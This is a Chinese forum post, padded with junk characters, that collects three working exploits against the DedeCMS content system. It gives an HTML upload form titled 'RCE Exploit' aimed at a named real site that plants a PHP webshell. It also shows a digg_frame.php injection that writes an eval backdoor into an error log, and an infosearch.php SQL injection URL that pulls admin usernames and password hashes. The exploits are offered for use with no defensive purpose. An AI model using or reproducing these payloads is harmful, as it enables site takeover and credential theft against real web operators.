" w2 |, d, c, r! W. K0 B& i
! V& [, Q4 P5 N( J2 m! U
$ l4 |7 [9 B p: K$ N# O2 a- q+ e5 e7 B
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
$ |( E2 t0 L r& _. [ h: e" {# }<html>$ P3 y/ c. R* G9 P, G1 n% n2 i! E
<head>
) }7 \& C5 S+ k' u$ ?/ M<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
" ]: q/ M5 q! K. \! u3 L* A</head>$ Z- W; h& M7 b# C8 N; O8 c" z
<body style="FONT-SIZE: 9pt">
* \/ i* p4 Z' Z: i1 {/ A8 I& J---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />2 K0 w- A( z* h1 V$ F
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
@$ @3 w; t ^' V0 {<input type='hidden' name='activepath' value='/data/cache/' />) v- R& z! t/ t/ I
<input type='hidden' name='cfg_basedir' value='../../' />
: H$ l: t- k n( b/ [<input type='hidden' name='cfg_imgtype' value='php' />
2 D! c. }5 k. Q* v( F+ C. Q<input type='hidden' name='cfg_not_allowall' value='txt' />+ r/ I2 S% c0 ^, r: J
<input type='hidden' name='cfg_softtype' value='php' />* C0 [3 T7 H4 g* f- C
<input type='hidden' name='cfg_mediatype' value='php' />
" X& l' i+ j9 i. X) w1 u7 |1 Q W$ q<input type='hidden' name='f' value='form1.enclosure' />: Q. \" \0 z x q. p8 l$ q
<input type='hidden' name='job' value='upload' />; R# }+ M: W1 Z; a
<input type='hidden' name='newname' value='fly.php' />& S6 V4 y- }0 {( @
Select U Shell <input type='file' name='uploadfile' size='25' />
+ A9 Z, \! k1 Y9 @" I) ?<input type='submit' name='sb1' value='确定' />, Q: \1 w# M- R0 N. T) k
</form>
~7 z! @" {4 |: w A<br />It's just a exp for the bug of Dedecms V55...<br />! I- ~1 u( R' }( x' D
Need register_globals = on...<br />
% l |8 h4 R1 ?% i8 u$ ?Fun the game,get a webshell at /data/cache/fly.php...<br />: T( T2 F( C" @& g; @
</body>; y: ?% i8 Z# t3 [ x* Q
</html>
+ b g5 O/ r* x% b
1 ?! q4 [7 k2 R( ]8 M# Z8 g
' ?8 _$ p, }2 J! m# Q$ }4 U0 @
& Q8 R2 @9 W! G8 T# \9 j
% f6 w5 ^) n* }+ n' R4 M# P+ W2 |9 k) b+ z: B4 d6 t! t: [" a) n5 i
+ P# ^ c9 j% B, M
7 c3 w+ `; d6 j" ]* X( v
+ a$ {1 s! s+ n/ P9 T. |3 Q& E2 z- f6 C0 w. J/ k7 P$ v
4 I& _4 N- r. V. C2 v+ C
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
6 F4 n% `! z( q5 ?( c7 M/ G* w利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。$ E h) @, T7 m9 r5 o) \$ l
1. 访问网址:
9 A- S: m- A$ nhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
6 I5 ]* } h9 i. [7 Y2 M! F可看见错误信息
# ]: Z3 R; T* v4 ]+ d1 U1 i' [* n5 q) b3 C& K2 m2 S
; U& K6 ~8 f7 Q& q( i
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
, h) Y1 M0 i& m# n% }- \int(3) Error: Illegal double '1024e1024' value found during parsing
1 E# Q9 k) ` JError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>& D4 o1 @6 z' \/ H
* [" F( M( t( E! I0 `+ w% |7 x3 i" e; j: r5 C0 A$ o5 U
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是! [0 r, w: `# |. [8 z5 n* J
+ m; t/ ]1 x p( c: T* ~) ^
7 {) r: K8 d) r7 H. v
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
' C; m9 }$ H! n- U
1 d! |: l) A5 D0 y
" j" O, D) V/ B; J按确定后的看到第2步骤的信息表示文件木马上传成功.
" G& b7 ` {+ W k7 e' \
+ t W9 }3 A9 w& y4 Z5 B- n- ^; u5 M2 k4 O ^
) |% e7 L$ q' B/ m5 C% n
" U& ]" k: F( z l r& w- x
6 r `0 c2 H$ {/ W' v6 q5 q$ J2 x' j
( p) l. u5 B, |4 i. p3 e5 v1 V
( f. ~# y0 R* r% [/ G4 b p2 W. k! j5 M3 ]" k
$ s( U6 C4 {6 Z- _" E9 @
' N0 u" Y$ e( |3 B( C& L" k
) h6 F& g1 B; K7 N0 z0 U4 b |! ~织梦(DedeCms)plus/infosearch.php 文件注入漏洞8 J. K2 ?+ ?- O7 T& s4 @) V4 l
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对